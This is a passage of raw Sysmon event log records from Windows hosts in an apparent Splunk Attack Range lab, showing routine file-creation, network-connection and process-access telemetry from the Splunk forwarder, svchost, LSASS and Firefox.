Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33C402B64BF16455DF5670B17C962C0E,SHA256=835360F021F49110D6831E6C1F130221BD1DCE5C7F5840AE057281A81F9EC8F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:13.378{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C717DAF07B6535F196C78B0B8AA73A9,SHA256=557B292EEDC1174AC8A7CA2B859AF970336199DE26418A22A48D6A70661CAE8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051845Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:14.829{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4559D7C6EF3C09129C98BF13374568A0,SHA256=AB535A3210CB671E23599F52A8C1C43D624F120E57B6866860E277DBF7AA8DAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:14.421{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3911F6311FDC4DD39A100EE538E6322,SHA256=564C404FC372EAB8CE2F4B82714AF03795F841DAF9CAAD672257E5AA5953C631,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051844Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:04.792{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local51130-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x8000000000000000808798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:12.260{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57354-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051847Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:15.846{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D488A637D26726200D71ACE47AA5C907,SHA256=6D87BDC2B7D1F2EDB7CF970540FAD7EC992122378F2BC2DF8A36B6484B868413,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:15.436{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA51E5A64D4B4CA7D436A9C199D6E8A7,SHA256=4D13065D147DC59EE07D97F1958791AD65C133ED33426B61A883C21318893A84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051846Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:15.481{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60940E08F13BD691933FA56FB3A83246,SHA256=7A7EA7800CA9ABAAC12222844AE0AB28DB1372066375FED2BD18ED3B11F0EB27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051850Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:16.865{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84B78D98E2F80ED90AAA97AA9A24B888,SHA256=B4817FF956612B5FC323005FA278668EB4228B5D13045A47A13E820DB3C270C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808801Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:16.515{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6A5F616D7DC219CD3850F8A0CB498A,SHA256=B13A9C4AA4A63042BACB105D1EAD55A8C68ED82AEB8D8F5D31C32926578A9D9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051849Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:08.002{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51131-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001051848Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:08.002{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51131-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001051851Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:17.880{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58004C551856F6B37612231F2282725C,SHA256=85B5E5479480AA7891950DE5B9AA5CC6278FDEE39B8E3DF5D5015AA943981A16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:17.530{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0120EEDB422260F711A556BAB853A08,SHA256=7E5F7CCDF79878A5D4A50909C80B17EF41D1E5A3BCFA89DADA6B79253F4B4067,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051854Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:18.911{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=609FF3AB5FF3C6181E831823AEABDB1D,SHA256=9A3B30E8CBECFF19808BEE772DEE5F7879248300F709D2EEE9DEA3C7B0F2D098,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:18.577{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85430A8A177F50B6EE45710D7B290E79,SHA256=77A3B7E5091D5ECFB76BAA78EE86D513A2939A7E3C479C1EB8B2DBDFB3513E28,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051853Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:10.647{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51132-false10.0.1.12-8000- 23542300x80000000000000001051852Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:18.380{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.926{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6265BCD9FA12C7B29ACC8287F2925F2A,SHA256=E264D05F46CD3B7EFCF4B5C5E4710E4BA654DB8279E01D9377067D83402FF0D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:19.624{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9D455A5811AB8780974073896D344EB,SHA256=7B09215A0BDA16D033BC3059E5D3D980B85A5823636587C5951C3D90033039E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051857Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.043{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051856Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.042{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051855Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:19.042{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:20.944{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CE84184DCC02A8C7007D58DB5D50263,SHA256=08FD9F122B5CB8B561432B9F972FC9A8E1483090D3C8A38ED937984019ACCC4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:20.671{0C1E0330-050B-60E8-9B00-00000000D001}1020NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:20.655{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37138AB299294F2D6C45AE5020E8C92E,SHA256=3D4A08B0CDA669AF7E5F774FFDF7C71484E24222F8E767BDA90B4A65A2A51945,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:18.225{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57355-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001051860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:21.962{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6F3705D6B6BB4E48C638CE991AFACD,SHA256=25FBDEA56E49CEC1EB4D5D1F57CC866996804F74B6857C8CA1C058FA2453A206,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:21.671{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=784950E6C432A2EF7D4ED8C062AAB0AB,SHA256=D324CDF74908426D937308882CA5B1800A1C10E328C7588B124453B5A7A9C76F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:22.978{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B7418366D0C902018DC0672B13E79A8,SHA256=A3546A163AE734952524B7C60DBEA752CDBEF0732ADCFBFAEBB264F38A6ED2BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808810Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:22.702{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDA73DE8DBF7B79BEA6AB7D888A9CE45,SHA256=BB1B1E75EE3EE77713803123D41EA6D0088557A3B36880D80E303FF1A185CBD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:20.803{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57356-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 23542300x8000000000000000808811Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:23.733{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A029118E2F3E6DDF223BF17F40F87013,SHA256=3C5E1AAD1EB37A18BF0DC8FC793E25A9E1C3A2A4223E75CD013380CECE6DC177,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:23.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BD4BE720981E99E7BB197975454D34D,SHA256=1D25E1B996F0F6254F4423567FEDFDE914E7C1E57561EBDC2356DEC9F3F36194,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:23.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BB528EBE9B9A4706278E7049A6A2E11F,SHA256=1B6C1A828E0F5F5A816DAE1D785B3E9BF918257FC3C0DD7FF2DE757533F9ECCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808826Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.764{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8458EACED5251D52C39950DC92EA10C,SHA256=C9E5C9AB6243CB2FFEB0C10D0BD920BEAAD4E8F4D641609CBC9FD6BBE58B3D56,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:16.660{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51133-false10.0.1.12-8000- 23542300x80000000000000001051864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:59:24.008{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35D418982C0D230A18402282CD50A988,SHA256=D172228F8CB213F0A73AED972ACE48382DAF789EA228C8EB51C58A9ECB6F6801,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000808825Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.530{0C1E0330-F65C-60EB-A479-00000000D001}1843640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808824Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65C-60EB-A479-00000000D001}184C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808823Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808822Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808821Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808820Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808819Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:24.343{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808818Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 